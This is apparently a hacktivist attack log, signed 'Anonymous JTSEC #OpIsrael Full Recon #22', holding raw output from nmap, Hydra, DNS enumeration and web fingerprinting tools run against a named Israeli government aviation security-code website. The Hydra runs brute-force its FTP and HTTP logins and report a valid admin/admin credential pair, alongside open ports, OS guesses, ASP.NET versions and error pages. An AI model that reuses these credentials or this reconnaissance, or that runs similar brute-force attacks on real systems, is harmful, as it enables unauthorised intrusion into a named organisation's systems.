HOP RTT      ADDRESS
1   34.65 ms 10.251.200.1
2   ... 3
4   39.58 ms 10.251.200.1
5   35.96 ms 10.251.200.1
6   35.95 ms 10.251.200.1
7   35.94 ms 10.251.200.1
8   35.94 ms 10.251.200.1
9   35.93 ms 10.251.200.1
10  35.93 ms 10.251.200.1
11  ... 18
19  35.12 ms 10.251.200.1
20  34.04 ms 10.251.200.1
21  ... 28
29  35.79 ms 10.251.200.1
30  34.66 ms 10.251.200.1

NSE: Script Post-scanning.
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.39 seconds
           Raw packets sent: 145 (13.258KB) | Rcvd: 183 (16.306KB)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:59 EST
Nmap scan report for 212.179.144.251
Host is up (0.068s latency).
Not shown: 20 filtered ports, 4 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 18.76 seconds
#######################################################################################################################################
 + -- --=[Port 21 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-27 01:00:14
[DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
[DATA] attacking ftp://212.179.144.251:21/
[STATUS] 117.00 tries/min, 117 tries in 00:01h, 108 to do in 00:01h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-27 01:02:04
 + -- --=[Port 22 closed... skipping.
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 80 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-27 01:02:04
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking http-get://212.179.144.251:80//
[80][http-get] host: 212.179.144.251   login: admin   password: admin
[STATUS] attack finished for 212.179.144.251 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-27 01:02:20
#######################################################################################################################################
dnsenum VERSION:1.2.4

-----   asoc.mot.gov.il   -----


Host's addresses:
__________________

asoc.mot.gov.il.                         80       IN    A        212.179.144.251


Name Servers:
______________
#######################################################################################################################################

% The data in the WHOIS database of the .il registry is provided
% by ISOC-IL for information purposes, and to assist persons in 
% obtaining information about or related to a domain name 
% registration record. ISOC-IL does not guarantee its accuracy.
% By submitting a WHOIS query, you agree that you will use this
% Data only for lawful purposes and that, under no circumstances
% will you use this Data to: (1) allow, enable, or otherwise 
% support the transmission of mass unsolicited, commercial 
% advertising or solicitations via e-mail (spam); 
% or  (2) enable high volume, automated, electronic processes that 
% apply to ISOC-IL (or its systems).
% ISOC-IL reserves the right to modify these terms at any time.
% By submitting this query, you agree to abide by this policy.
 
% No data was found to match the request criteria.
#######################################################################################################################################


Running Source:  [33;1;1mAsk
Running Source:  [33;1;1mArchive.is
Running Source:  [33;1;1mBaidu
Running Source:  [33;1;1mBing
Running Source:  [33;1;1mCertDB
Running Source:  [33;1;1mCertificateTransparency
Running Source:  [33;1;1mCertspotter
Running Source:  [33;1;1mCommoncrawl
Running Source:  [33;1;1mCrt.sh
Running Source:  [33;1;1mDnsdb
Running Source:  [33;1;1mDNSDumpster
Running Source:  [33;1;1mDNSTable
Running Source:  [33;1;1mDogpile
Running Source:  [33;1;1mExalead
Running Source:  [33;1;1mFindsubdomains
Running Source:  [33;1;1mGoogleter
Running Source:  [33;1;1mHackertarget
Running Source:  [33;1;1mIpv4Info
Running Source:  [33;1;1mPTRArchive
Running Source:  [33;1;1mSitedossier
Running Source:  [33;1;1mThreatcrowd
Running Source:  [33;1;1mThreatMiner
Running Source:  [33;1;1mWaybackArchive
Running Source:  [33;1;1mYahoo

Running enumeration on asoc.mot.gov.il

dnsdb: Unexpected return status 503

waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.asoc.mot.gov.il/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.asoc.mot.gov.il/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer


Starting Bruteforcing of  [33;1;1masoc.mot.gov.il with  [33;1;1m9985 words

Total  [33;1;1m1 Unique subdomains found for asoc.mot.gov.il

.asoc.mot.gov.il
#######################################################################################################################################
[*] Processing domain asoc.mot.gov.il
[+] Getting nameservers
[-] Getting nameservers failed
[-] Zone transfer failed

[*] Scanning asoc.mot.gov.il for A records
212.179.144.251 - asoc.mot.gov.il
                                        
#######################################################################################################################################
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  discover v0.5.0 - by @michenriksen

Identifying nameservers for asoc.mot.gov.il... Done
Using nameservers:

 - 192.115.7.53
 - 194.0.11.103
 - 128.139.35.5
 - 192.115.7.60
 - 162.88.57.1
 - 192.5.4.1
 - 192.115.141.253
 - 194.146.106.122
 - 62.219.20.20
 - 128.139.34.240

Checking for wildcard DNS... Done

Running collector: Threat Crowd... Done (0 hosts)
Running collector: DNSDB... Error
 -> DNSDB returned unexpected response code: 503
Running collector: Netcraft... Done (0 hosts)
Running collector: PublicWWW... Done (0 hosts)
Running collector: Censys... Skipped
 -> Key 'censys_secret' has not been set
Running collector: Wayback Machine... Done (1 host)
Running collector: PTRArchive... Error
 -> PTRArchive returned unexpected response code: 502
Running collector: PassiveTotal... Skipped
 -> Key 'passivetotal_key' has not been set
Running collector: Shodan... Skipped
 -> Key 'shodan' has not been set
Running collector: Riddler... Skipped
 -> Key 'riddler_username' has not been set
Running collector: Dictionary... Done (0 hosts)
Running collector: VirusTotal... Skipped
 -> Key 'virustotal' has not been set
Running collector: HackerTarget... Done (1 host)
Running collector: Google Transparency Report... Timed out
Running collector: Certificate Search... Done (0 hosts)

Resolving 1 unique hosts...
212.179.144.251 asoc.mot.gov.il

Found subnets:


Wrote 1 hosts to:

 - file:///root/aquatone/asoc.mot.gov.il/hosts.txt
 - file:///root/aquatone/asoc.mot.gov.il/hosts.json
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  takeover v0.5.0 - by @michenriksen

Loaded 1 hosts from /root/aquatone/asoc.mot.gov.il/hosts.json
Loaded 25 domain takeover detectors

Identifying nameservers for asoc.mot.gov.il... Done
Using nameservers:

 - 192.115.7.53
 - 194.0.11.103
 - 128.139.35.5
 - 192.115.7.60
 - 162.88.57.1
 - 192.5.4.1
 - 192.115.141.253
 - 194.146.106.122
 - 62.219.20.20
 - 128.139.34.240

Checking hosts for domain takeover vulnerabilities...

Finished checking hosts:

 - Vulnerable     : 0
 - Not Vulnerable : 1

Wrote 0 potential subdomain takeovers to:

 - file:///root/aquatone/asoc.mot.gov.il/takeovers.json

                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  scan v0.5.0 - by @michenriksen

Loaded 1 hosts from /root/aquatone/asoc.mot.gov.il/hosts.json

Probing 2 ports...
80/tcp    212.179.144.251 asoc.mot.gov.il

Wrote open ports to file:///root/aquatone/asoc.mot.gov.il/open_ports.txt
Wrote URLs to file:///root/aquatone/asoc.mot.gov.il/urls.txt
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  gather v0.5.0 - by @michenriksen

Processing 1 pages...

Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:52 EST
Nmap scan report for asoc.mot.gov.il (212.179.144.251)
Host is up (0.10s latency).
Not shown: 470 filtered ports, 4 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:52 EST
Nmap scan report for asoc.mot.gov.il (212.179.144.251)
Host is up (0.035s latency).
Not shown: 2 filtered ports
PORT     STATE         SERVICE
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 00:52 EST
Nmap scan report for asoc.mot.gov.il (212.179.144.251)
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 4116 guesses in 180 seconds, average tps: 22.6
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP
Running (JUST GUESSING): Microsoft Windows 2003|XP (89%), Apple embedded (85%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_xp::sp3 cpe:/h:apple:airport_extreme
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 (89%), Microsoft Windows Server 2003 SP2 (89%), Microsoft Windows XP SP3 or Windows Server 2003 SP2 (89%), Microsoft Windows 2003 (88%), Microsoft Windows Server 2003 SP1 or SP2 (88%), Apple AirPort Extreme WAP (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   35.31 ms  10.251.200.1
2   35.74 ms  184.75.211.209
3   35.51 ms  104.245.147.41
4   35.80 ms  206.108.34.112
5   46.57 ms  100ge11-2.core1.nyc5.he.net (184.105.81.53)
6   106.06 ms 184.105.65.246
7   110.10 ms 72.52.92.197
8   144.54 ms 100ge16-1.core1.ams1.he.net (184.105.213.65)
9   132.74 ms 80.249.209.46
10  182.76 ms bzq-219-189-77.cablep.bezeqint.net (62.219.189.77)
11  184.12 ms 62.219.189.1
12  186.47 ms bzq-179-162-70.pop.bezeqint.net (212.179.162.70)
13  181.43 ms bzq-179-162-58.pop.bezeqint.net (212.179.162.58)
14  187.26 ms bzq-179-144-251.pop.bezeqint.net (212.179.144.251)
#######################################################################################################################################

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://asoc.mot.gov.il
#######################################################################################################################################
http://asoc.mot.gov.il [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId], Country[ISRAEL][IL], HttpOnly[ASP.NET_SessionId], IP[212.179.144.251], PasswordField[ctl00$MenuHeader$AWUCLogin1$password], Script[JavaScript,javascript,text/javascript], Title[Security Code System][Title element contains newline(s)!], X-Powered-By[ASP.NET]
#######################################################################################################################################
wig - WebApp Information Gatherer


Scanning http://asoc.mot.gov.il...
___________________________ SITE INFO ___________________________
IP                    Title                                      
212.179.144.251       Security Code System                     
                                                                 
____________________________ VERSION ____________________________
Name                  Versions                Type               
ASP.NET               2.0.50727.42            Platform           
                                                                 
__________________________ INTERESTING __________________________
URL                   Note                    Type               
/_layouts/none.aspx   ASP.NET detailed error  Interesting        
                                                                 
_____________________ PLATFORM OBSERVATIONS _____________________
Platform              URL                     Type               
ASP.NET 2.0.50727                             Observation        
ASP.NET 2.0.50727.42  /_layouts/none.aspx     Observation        
                                                                 
_________________________________________________________________
Time: 324.8 sec       Urls: 620               Fingerprints: 40401
#######################################################################################################################################
HTTP/1.1 200 OK
Date: Tue, 27 Nov 2018 06:02:34 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=voeish454civhg55t4mvyomm; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15647
Connection: keep-alive
#######################################################################################################################################
---------------------------------------------------------------------------------------------------------------------------------------

[ ! ] Starting SCANNER INURLBR 2.1 at [27-11-2018 01:03:18]
[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/plugins/slurp/output/inurlbr-asoc.mot.gov.il.txt  ]
[ INFO ][ DORK ]::[ site:asoc.mot.gov.il ]
[ INFO ][ SEARCHING ]:: { 
[ INFO ][ ENGINE ]::[ GOOGLE - www.google.se ]

[ INFO ][ SEARCHING ]:: 
-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE API ]

[ INFO ][ SEARCHING ]:: 
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.cu ID: 013269018370076798483:wdba3dlnxqm ]

[ INFO ][ SEARCHING ]:: 
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]

[ INFO ][ TOTAL FOUND VALUES ]:: [ 11 ]


 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 0 / 11 ]-[01:03:24] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/ ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 1 / 11 ]-[01:03:25] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/terms.aspx ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 2 / 11 ]-[01:03:26] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/GAinstructions.aspx ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 3 / 11 ]-[01:03:27] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/ArravalProcedure.aspx ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 4 / 11 ]-[01:03:28] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/subentrycodeinst.aspx ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 5 / 11 ]-[01:03:29] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/notificationofarrival.aspx ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 6 / 11 ]-[01:03:30] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/contact.aspx ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 7 / 11 ]-[01:03:30] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/downloads.aspx ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 8 / 11 ]-[01:03:31] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/sitemap.aspx ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 9 / 11 ]-[01:03:32] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/system.aspx ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 200 OK,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 10 / 11 ]-[01:03:33] [ - ] 
|_[ + ] Target:: [ http://asoc.mot.gov.il/Docs/Aviation Bulletins Jan 09.pdf ]
|_[ + ] Exploit:: 
|_[ + ] Information Server:: HTTP/1.1 404 Not Found,   X-Powered-By: ASP.NET, IP:212.179.144.251:80 
|_[ + ] More details::  / -  / , ISP: 
|_[ + ] Found:: UNIDENTIFIED

[ INFO ] [ Shutting down ]
[ INFO ] [ End of process INURLBR at [27-11-2018 01:03:33]
[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/plugins/slurp/output/inurlbr-asoc.mot.gov.il.txt  ]
|_________________________________________________________________________________________

\_________________________________________________________________________________________/
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-27 01:05 EST
Nmap scan report for asoc.mot.gov.il (212.179.144.251)
Host is up (0.067s latency).
Not shown: 20 filtered ports, 4 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
#######################################################################################################################################
 + -- --=[Port 21 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-27 01:05:23
[DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
[DATA] attacking ftp://asoc.mot.gov.il:21/
[STATUS] 119.00 tries/min, 119 tries in 00:01h, 106 to do in 00:01h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-27 01:07:11
 + -- --=[Port 22 closed... skipping.
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 80 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-27 01:07:11
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking http-get://asoc.mot.gov.il:80//
[80][http-get] host: asoc.mot.gov.il   login: admin   password: admin
[STATUS] attack finished for asoc.mot.gov.il (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-27 01:07:12
######################################################################################################################################
                                            Anonymous JTSEC #OpIsrael  Full Recon #22